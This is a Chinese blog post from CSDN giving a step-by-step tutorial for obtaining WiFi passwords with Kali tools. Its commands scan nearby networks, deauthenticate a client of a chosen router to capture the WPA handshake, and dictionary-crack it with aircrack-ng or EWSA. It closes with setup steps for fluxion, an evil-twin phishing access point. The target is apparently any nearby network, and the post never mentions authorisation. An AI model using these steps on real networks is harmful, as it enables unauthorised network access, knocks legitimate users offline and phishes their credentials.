渗透测试基础(五) 获取WiFi密码

已于 2024-07-01 21:03:24 修改
阅读量79 收藏 3
点赞数 1
文章标签: 网络安全 渗透测试
于 2024-06-20 12:47:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29086043/article/details/139800043
版权

1. 前提条件

  • 需要无线网卡,kali无法识别电脑自带的网卡。

2. 实验步骤:

2.1 查看网卡

  • 命令:airmon-ng
    在这里插入图片描述

2.2 启动网卡监听模式

  • 命令airmon-ng start wlan0
    在这里插入图片描述
  • 检查下是否处于监听模型:ifconfig查看一下,如果网卡名加上了mon后则成功
    在这里插入图片描述

2.3 扫描周围wifi

  • 命令airodump-ng wlan0mon
    在这里插入图片描述
    • BSSID:路由的MAC地址。
    • PWR:信号强度,越小信号越强。
    • #Data:传输的数据.。
    • CH:信号频道,只有在一个频道才可进行下一步操作。
    • ESSID:wifi的名称,中文的可能会乱码。

2.4 获取wifi密码

  • 选取TP-747进行获取

    • -c:指定信道
    • -w:指定抓去握手包的存放位置或者名字
    • –bssid:指定路由器的MAC

  • 输入airodump-ng -c 1 –bssid A8:5E:45:EF:6F:80 -w /root wlan0mon
    在这里插入图片描述

    • 可见有一个用户正在使用此wifi
    • 另开一个终端
    • 执行如下命令,一个客户机的MAC,和路由器的MAC
      • -a:指定路由器的MAC
      • -c:指定客户机的MAC

  • aireplay-ng -0 2 -a A8:5E:45:EF:6F:80 -c B8:B2:F8:D4:8A:88 wlan0mon
    在这里插入图片描述

  • 这时我们看刚刚的终端,然后ctrl+c 退出抓包
    在这里插入图片描述

  • 来到保存的目录查看刚刚抓的包,这里的后缀不一定和我一样。
    在这里插入图片描述

  • 用kali自带的工具,aircrack-ng root-09.ivs -w pass.txt,如果字典强大就能找到。
    在这里插入图片描述

    • 失败截图
      在这里插入图片描述

    • 成功截图
      在这里插入图片描述

  • 或者使用EWSA来跑字典(可使用GPU,效率更高。)打开EWSA软件
    在这里插入图片描述

  • 导入刚刚抓到的包
    在这里插入图片描述

  • 导入字典
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • fluxion搭建钓鱼wifi获取wifi密码

    • 下载fluxion
      • git clone https://github.com/FluxionNetwork/fluxion.git
    • 进入到fluxion目录
      • cd fluxion
    • 安装fluxion
      • ./fluxion.sh -i 第一次需要安装依赖之后就 - ./fluxion.sh就行
魂•殿
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
带你了解无线网络渗透测试——无线网络嗅探工具Kismet
HBohan的博客
06-25 3342
如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点。刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。 (1)启动Kismet工具。执行命令如下所示: root@kali:~# kismet 执行以上命令后,将显示如图9.1所示的界面。 图9.1 终端延伸 (2)该界面用来设置是否是用终端默认的颜色。因为Kismet默认颜色是灰色,可能一些终端不能显示。这里使用默认.
Kali渗透测试:散列密码破解
Liu_Bruce的博客
05-26 4139
Kali渗透测试:散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
无线网络渗透测试(一)
Darenfy 随记
03-09 1912
实验配置 主机环境:Mac 测试机环境:Kali 2019 虚拟机 手机:Huawei Mate20 Pro 路由器:Honor CD30 无线网卡芯片型号:Realtek Rtl8812au 概念 渗透测试 渗透人员在不同的位置利用各种手段对某个特定网络进行测试 测试流程 通过扫描确定目标主机的范围,如 IP 域名 内外网 针对目标进行信息搜集,开放端口 服务 操作系统类型 域名Whois 信息 利用信息进行漏洞扫描 利用漏洞对目标实施渗透 便携测试报告 简略 AP :Acc.
无线网络渗透测试
GitChat
07-03 1924
无线网络渗透测试,作为一种非传统型的渗透测试方向,还是有一点点的门槛,即类似“WIFI”等无线网络的攻防战,很多设备联网就有被黑掉的可能,包括支持无线网连接的 LED 显示屏,某些厂家的智能设备,即便是公司 WIFI,不做好范围和内网隔离很容易被攻击者进入。 所以本场 Chat,我会尽量详细的去以攻击者的角度去讲,内容包含以下几个方面: 无线网基本组成和硬件 802.11协议; WPA 系统; ...
渗透测试--6.无线网络渗透
我是个好人呀,????
05-18 1464
大家应该都有过这样的经历,就是感觉自己家的无线网怎么感觉好像变慢了,"是不是有人蹭我家网?"“还有的时候咱们出门也想试图蹭一下别人家的网”,这里**“蹭网"的前提是要破解对方的"无线密码”,那么这个"无线密码"到底是否安全呢?其技术原理是如何的呢?我们又应该如何防范他人"蹭网"呢?**
安全测试(四) Wi-Fi安全 渗透测试 网络安全 公共场的免费Wi-Fi真的安全吗?个人信息被监控窃听风险 如: ARP攻击 SSL攻击 DNS安全 加密方式等 枚举实战应用案例 信息窃听获取
Benjamin CSDN博客
12-28 7012
安全测试(四) Wi-Fi安全 渗透测试 网络安全 公共场的免费Wi-Fi真的安全吗?个人信息被监控窃听风险 如: ARP攻击 SSL攻击 DNS安全 加密方式等 枚举实战应用案例 信息窃听获取 3、Wi-FI安全攻击和测试原理说明 3.1网络连接正常检查 3.2二次访问验证 3.3 ARP攻击(Address Resolution Protocol) 3.3.1 APR攻击 简介 3.3.2ARP攻击 危害 3.3.3ARP攻击 检测
网银渗透测试流程
07-12
【网银渗透测试流程详解】 渗透测试是一种模拟黑客攻击行为,以发现并修复系统安全漏洞的过程,尤其在金融行业中,如网银系统,其安全性至关重要。以下是对网银渗透测试流程的详细阐述: 1. **准备阶段** - **...
渗透必备 亲测可用】 *.bin文件 提取wifi路由器密码 宽带账号密码
07-16
在IT安全领域,尤其是网络渗透测试中,获取网络设备的登录凭证是常见步骤之一,这有助于测试系统的安全性。本文将详细讲解如何利用给定的工具——`RouterPassView`来提取WiFi路由器密码以及宽带账号密码。 `...
WiFi-Pumpkin-master.zip
07-14
WiFi-Pumpkin是一款强大的无线网络安全渗透测试工具,主要用于模拟中间人攻击并进行无线环境的渗透测试。这个框架设计的目标是让安全研究人员和网络管理员能够更好地理解无线网络的安全性,并识别潜在的漏洞。在本...
隐藏wifi-ssid获取 · theKingOfNight's Blog1
08-03
在提供的内容中,我们看到一系列命令行操作,这通常是在Linux系统(如Parrot OS)中进行的,Parrot OS是一款专门用于渗透测试和安全研究的操作系统。首先,`airmon-ng check kill` 命令是用来关闭可能干扰无线监控...
Kali Linux无线网络渗透测kali安装教程
11-06
kali安装教程,适合新手练习渗透测试,ali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
wifi精华字典(手机号)
10-22
在IT安全领域,这样的字典文件是常见的工具,尤其是对于无线网络渗透测试或者安全评估。 描述中的“相当不错的WiFi字典”意味着这个字典包含的手机号码数量可能较大,覆盖面广,可能提高了在尝试连接某些以手机号码...
无线渗透测试总结
hl1293348082的专栏
04-10 373
如今,几乎人人都有手机,移动端设备数不胜数,手机、平板、笔记本都要使用无线网络,所以无线安全是非常重要的,本文的主要目的是无线渗透测试的方法总结,本文来源于老外的总结,可以点击原文连接查看原文,这里使用的操作系统是kali。 基本操作 关掉监控进程 root@uceka:~# airmon-ng check kill 打开监控模块 增加Wifi发送功率 更改WiFi频道 root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14
无线网络渗透测试清单
热门推荐
网络研究观
12-26 1万+
无线渗透测试积极检查 WiFi 网络中的信息安全措施的过程,并分析弱点、技术流程和关键无线漏洞。
干货 | WiFi无线渗透测试总结
最新发布
2301_76161259的博客
07-04 1086
1.WPA2:是WPA的升级版,是针对保护无线网络安全而设计的无线网络保护系统,引入了PSK(预共享密钥模式)秘钥,加强了WPA的不足之处,但是因为使用了PSK,所以只要攻击者知晓目标的PSK秘钥,就能十分轻易加入无线网络。2.WPA3:是近几年新出现的无线网络安全保护系统,在WPA2的基础上实现了针对字典法暴力密码破解的难度,如果失败次数过多,AP将直接锁定攻击行为,以及取代了PSK使用对等实体验证(SAE)3.AP:特指无线网络接入点,就是路由器等设备的广泛称呼。
wifi渗透-狸猫换太子
hl1293348082的专栏
04-06 571
上期作者发布了一篇关于wifi钓鱼的方法,今天我来给大佬们带来一篇关于拿到wifi密码能干什么? 我相信很多人都玩过ettercap和driftnet神器软件,用他们能干什么?没有错就是玩中间人非常好的,我们假设在一个局域网我们作为中间人嗅探他们的信息和劫持,我相信大家都会玩,然后我们对一个手机进行欺骗用ettercap来arp在用driftnet对手机的图片进行劫持上传到入侵者的电脑里面他就知道你在看什么图片,在那个网站看的想想就觉得可怕。 然后我就突发奇想,觉得只是能看到他的图片不够刺激想来点刺激的
WIFI渗透工具 一些 介绍
dudu3332的博客
11-28 374
https://cloud.tencent.com/developer/article/1180575
探索渗透测试基础入门与实战指南
课程中,信息收集被着重讲解,其中包括使用搜索引擎等工具来获取目标系统的关键信息,这是渗透测试基础步骤。通过实际操作,学员将学习到如何有效地进行信息搜集,以便于后续的漏洞分析和攻击模拟。 渗透测试的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魂•殿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值